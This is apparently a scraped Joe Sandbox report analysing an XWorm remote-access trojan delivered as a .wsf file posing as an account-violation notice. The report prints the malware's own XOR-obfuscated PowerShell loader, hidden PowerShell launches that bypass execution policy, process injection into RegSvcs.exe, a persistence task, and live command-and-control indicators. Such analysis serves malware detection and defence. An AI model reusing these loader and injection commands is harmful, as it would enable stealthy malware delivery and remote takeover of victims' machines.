            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40A000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 707008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40A000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B4B008
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$redro = . ( $pshome[4]+$pshome[30]+'x')(-join( '122f12!99,121{23i59c6j118,16,59b121{101c122,12k27f126{99k126!122i12c117o121j9o115o17c28,20o121!101j122b12!27k26!126f99i126i122i12f27c117b121c59c29f10j126k16k59k10!112o9b121f101k122i14!31c29i99i121o59{28b29k18j121k101c122o38!38f126b99c126,122!14{31{29f117c121j23f59o16{121!101b122k12i17c126{99!126!122!38{38k117o121,10o119k112k26o17f9c16i18k17f121,101c122c36j36,99i121b17j30o110,118j120o118c121o121i54!42b42c46c45o100i113,113c46{63k45i42f59i112j59{59f113i44i113o47b58!43{13f24b113o110f121f121c119f121j112f12{59o14c18c31o29k59c118!121{17b30j110b118k120k121{114o121k31b26c13j10f12,23!16{25b121c119{101k55!59o38{118,122!12,27!26o117c122i12j17b117{122c36k36f119'.split( ',!kji{cbof')|% { [char] ( $_ -bxor 0x5e ) } )) ; powershell $redro"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$redro = . ( $pshome[4]+$pshome[30]+'x')(-join( '122f12!99,121{23i59c6j118,16,59b121{101c122,12k27f126{99k126!122i12c117o121j9o115o17c28,20o121!101j122b12!27k26!126f99i126i122i12f27c117b121c59c29f10j126k16k59k10!112o9b121f101k122i14!31c29i99i121o59{28b29k18j121k101c122o38!38f126b99c126,122!14{31{29f117c121j23f59o16{121!101b122k12i17c126{99!126!122!38{38k117o121,10o119k112k26o17f9c16i18k17f121,101c122c36j36,99i121b17j30o110,118j120o118c121o121i54!42b42c46c45o100i113,113c46{63k45i42f59i112j59{59f113i44i113o47b58!43{13f24b113o110f121f121c119f121j112f12{59o14c18c31o29k59c118!121{17b30j110b118k120k121{114o121k31b26c13j10f12,23!16{25b121c119{101k55!59o38{118,122!12,27!26o117c122i12j17b117{122c36k36f119'.split( ',!kji{cbof')|% { [char] ( $_ -bxor 0x5e ) } )) ; powershell $redro" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4155550243.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4155550243.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7624, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7300, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information222
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            222
            Scripting
            211
            Process Injection
            1
            Masquerading
            OS Credential Dumping111
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            2
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution
            Logon Script (Windows)Logon Script (Windows)121
            Virtualization/Sandbox Evasion
            Security Account Manager121
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts3
            PowerShell
            Login HookLogin Hook211
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeylogging11
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517939 Sample: reported_account_violation-... Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 48 paste.ee 2->48 50 api.telegram.org 2->50 52 2 other IPs or domains 2->52 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 9 other signatures 2->72 10 wscript.exe 1 2->10         started        13 wscript.exe 2->13         started        15 wscript.exe 1 2->15         started        signatures3 68 Connects to a pastebin service (likely for C&C) 48->68 70 Uses the Telegram API (likely for C&C communication) 50->70 process4 signatures5 82 Wscript starts Powershell (via cmd or directly) 10->82 17 cmd.exe 1 10->17         started        20 cmd.exe 13->20         started        84 VBScript performs obfuscated calls to suspicious functions 15->84 86 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->86 88 Suspicious execution chain found 15->88 22 powershell.exe 15->22         started        process6 signatures7 56 Suspicious powershell command line found 17->56 58 Wscript starts Powershell (via cmd or directly) 17->58 60 Bypasses PowerShell execution policy 17->60 24 cmd.exe 1 17->24         started        27 conhost.exe 17->27         started        29 cmd.exe 1 20->29         started        31 conhost.exe 20->31         started        33 powershell.exe 7 22->33         started        35 conhost.exe 22->35         started        process8 signatures9 78 Suspicious powershell command line found 24->78 80 Wscript starts Powershell (via cmd or directly) 24->80 37 powershell.exe 15 24->37         started        40 powershell.exe 29->40         started        process10 signatures11 74 Writes to foreign memory regions 37->74 76 Injects a PE file into a foreign processes 37->76 42 RegSvcs.exe 2 37->42         started        46 RegSvcs.exe 1 40->46         started        process12 dnsIp13 54 ALBANIAH3CKER.WORK.GD 94.198.50.33, 63994, 7000 DHUBRU Russian Federation 42->54 90 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 42->90 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            reported_account_violation-pdf-67223451.wsf11%ReversingLabsScript-WScript.Trojan.XWormRAT
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            ALBANIAH3CKER.WORK.GD100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            paste.ee
            188.114.97.3
            truetrue
              unknown
              api.ipify.org
              104.26.13.205
              truefalse
                unknown
                ALBANIAH3CKER.WORK.GD
                94.198.50.33
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    ALBANIAH3CKER.WORK.GDtrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000C.00000002.4155550243.00000000028D1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    94.198.50.33
                    ALBANIAH3CKER.WORK.GDRussian Federation
                    56694DHUBRUtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1517939
                    Start date and time:2024-09-25 09:26:31 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 5s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:reported_account_violation-pdf-67223451.wsf
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winWSF@27/8@4/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 15
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .wsf
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target RegSvcs.exe, PID 7300 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: reported_account_violation-pdf-67223451.wsf
                    TimeTypeDescription
                    03:27:37API Interceptor89x Sleep call for process: powershell.exe modified
                    03:27:51API Interceptor7589565x Sleep call for process: RegSvcs.exe modified
                    08:27:35Task SchedulerRun new task: MicroSoftVisualsUpdater path: C:\ProgramData\Music\Visuals\VsLabs.vbs
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    94.198.50.33ksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                      IYUHYTPBkr.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                        r2S1Hfanqk.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                          Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                            k7lvF8JOfK.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                              eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                  asd.wsfGet hashmaliciousXWormBrowse
                                    Zoom_Invite.call-660111329517.wsfGet hashmaliciousXWormBrowse
                                      reported_account_information-pdf-66268481.wsfGet hashmaliciousXWormBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ALBANIAH3CKER.WORK.GDksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        IYUHYTPBkr.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        r2S1Hfanqk.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        k7lvF8JOfK.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        asd.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        Zoom_Invite.call-660111329517.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        reported_account_information-pdf-66268481.wsfGet hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        paste.eeNew_Document-660128863990.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        New_Document-660119928827.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        New_Document-0706282.jsGet hashmaliciousUnknownBrowse
                                        • 188.114.97.3
                                        asd.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        Commitment_for_Title_Insurance-660184790411.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        Document-660117765723.wsfGet hashmaliciousXWormBrowse
                                        • 188.114.97.3
                                        evidenne_for_suspect_2481u41u824u8124-pdf-660103895361.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        FacebookViolation-660100314468.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        Invite.call-660113477887.wsfGet hashmaliciousUnknownBrowse
                                        • 188.114.96.3
                                        api.ipify.orgCOMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 104.26.12.205
                                        http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 104.26.13.205
                                        http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 172.67.74.152
                                        http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 172.67.74.152
                                        http://pub-382f9bec371e490e8d86f2689f3915b0.r2.dev/response_start.htmlGet hashmaliciousUnknownBrowse
                                        • 104.26.12.205
                                        http://pub-8cc4fdf972304092b2aa97a68f50cd88.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                                        • 104.26.13.205
                                        https://check-smulti-9635.pages.dev/robots.txt/Get hashmaliciousHTMLPhisherBrowse
                                        • 104.26.13.205
                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                        • 104.26.12.205
                                        xmr_linux_amd64 (3).elfGet hashmaliciousXmrigBrowse
                                        • 104.26.13.205
                                        api.telegram.orgInquiry List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        TT copy for SO-2409-032.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        https://www.slovago.sk/webtemp/Swiss-kunden/Get hashmaliciousHTMLPhisherBrowse
                                        • 149.154.167.220
                                        http://www.thailand-villas.com/img/destinations/tw/Get hashmaliciousUnknownBrowse
                                        • 149.154.167.220
                                        r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 149.154.167.220
                                        LUYYSwStKN.ps1Get hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        cFvDKWB1V8.ps1Get hashmaliciousXWormBrowse
                                        • 149.154.167.220
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        DHUBRUksQFeEiSrk.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        IYUHYTPBkr.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        r2S1Hfanqk.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        Ox980wdz11.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        k7lvF8JOfK.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
                                        • 94.198.50.33
                                        eKgbSLP6z6.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        jJqm9V8zJ9.ps1Get hashmaliciousXWormBrowse
                                        • 94.198.50.33
                                        asd.wsfGet hashmaliciousXWormBrowse
